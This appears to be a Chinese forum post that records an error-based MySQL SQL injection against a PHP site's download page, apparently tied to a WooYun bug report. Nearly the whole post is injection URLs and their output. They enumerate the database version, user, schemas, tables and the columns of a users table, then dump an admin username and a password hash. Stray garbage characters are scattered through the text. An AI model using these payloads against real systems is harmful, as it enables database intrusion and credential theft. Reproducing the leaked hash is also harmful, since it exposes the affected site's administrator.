php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666
+ o* h( d' a$ O9 T( Q0 N
: Q. N1 v/ k5 j9 _$ k! l之前想找个测试 没想到这有 可以测试下做个记录而已

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
( s/ A! ^0 I0 ]2 x  a; G
! x  {2 }' N; A) A1 d/data0/htdocs/leqi_new/app/myapp.php
0 t8 p5 A" n# M
或者
4 {+ z) ?, K, b9 L% S
5 }( Z+ C0 g0 j$ a/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

5 U% S* V1 H0 {# y6 ~& i. K/**********user()**********/  
5 n( h; u  x- B# C7 f) Rhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
0 A* T2 Z$ \- K0 C+ A* dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********limit依次递归爆库**********/
- ^" p- `1 W+ i" ^4 _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! K4 b# u& f" n* ~4 F# W( y8 p; Dleqi
( b# T) ?# ]4 y" Y; j: @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. r9 n1 f; P+ W$ z' @test

/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
- s) m( |. O5 \' B
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ X  }: A; e' s- T7 Yuser_id,username,nickname,passwd,group_id
# p, N4 g8 x+ T/ m) A- ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
- P$ U. y9 \# j0 H! _6 M, Jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
* S6 J! Q: ~: h7 r' P2 `% C9 S: o/wapc/5000_0005_003
11 341 351 361
1 j6 A, s9 @, h: k. v" M/**********爆数据**********/
% Q, _# y$ G2 G: m4 r  @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6 G4 [% r9 p  Y! E9 Ladmin
- P/ c, g) `: ^/ Q7 `* j, Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 p2 t2 ]. [% `1 l8 m6a8b4574ca231eb8bd52764d4978ffcd

- c2 ~0 ]. {9 |! s5 g. u: q
& U  H& i: I! @- A7 {